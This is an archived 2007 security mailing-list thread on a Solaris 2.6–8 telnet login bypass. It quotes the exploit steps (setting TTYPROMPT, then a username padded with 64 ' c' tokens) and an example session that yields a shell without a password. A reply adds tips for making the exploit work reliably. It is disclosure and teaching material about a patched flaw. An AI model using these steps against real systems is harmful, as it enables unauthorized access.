| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 22 Feb 2007 12:45:25 -0500 From: "Roger A. Grimes" <roger@...neretcs.com> To: "Thierry Zoller" <Thierry@...ler.lu>, <bugtraq@...urityfocus.com> Cc: <full-disclosure@...ts.grok.org.uk> Subject: RE: Re[2]: Solaris telnet vulnberability - how many on your network? Fun ole exploit. Of course, it doesn't have to be C's. I use numbers 1-9 and 0, repeated so its easier to count 64 characters. It can be nearly any character, as long as you have the spaces in between. It doesn't even have to be 64 characters all the time, but it normally has to be 64 or slightly more. I've even messed up on the end portion, putting a / slash instead of a backward slash, because I'm a Windows guy of course. It works every time the way it is said below (with any character) though, but it is forgiving at times. I've taugh this exploit hundreds of times to students in Foundstone's Ultimate Hacking Expert class, and most students mess it up the first time and it still often works. And of course, you can use root if root is not prevented from doing remote telnet logons. Note, however, if you mess it up the first time, exit all the way back out of telnet, and get back in, to begin again. Roger ******************************************************************* *Roger A. Grimes, Senior Security Consultant *Microsoft Application Consulting and Engineering (ACE) Services *http://blogs.msdn.com/ace_team/default.aspx *CPA, CISSP, MCSE: Security (2000/2003/MVP), CEH, yada...yada... *email: roger@...neretcs.com or rogrim@...rosoft.com ******************************************************************* -----Original Message----- From: Thierry Zoller [mailto:Thierry@...ler.lu] Sent: Wednesday, February 21, 2007 1:58 PM To: bugtraq@...urityfocus.com Cc: full-disclosure@...ts.grok.org.uk Subject: Re[2]: Solaris telnet vulnberability - how many on your network? Dear Marc, This is hilarious, should there ever be a Top10 of the most weird bugs, this surely is one of them, repost for pure amusement : Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the environment variable TTYPROMPT. This vulnerability has already been reported to BugTraq and a patch has been released by Sun. However, a very simple exploit, which does not require any code to be compiled by an attacker, exists. The exploit requires the attacker to simply define the environment variable TTYPROMPT to a 6 character string, inside telnet. I believe this overflows an integer inside login, which specifies whether or not the user has been authenticated (just a guess). Once connected to the remote host, you must type the username, followed by 64 " c"s, and a literal "\n". You will then be logged in as the user without any password authentication. This should work with any account except root (unless remote root login is allowed). Example: coma% telnet telnet> environ define TTYPROMPT abcdef telnet> o localhost SunOS 5.8 bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n Last login: whenever $ whoami bin -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7
Powered by blists - more mailing lists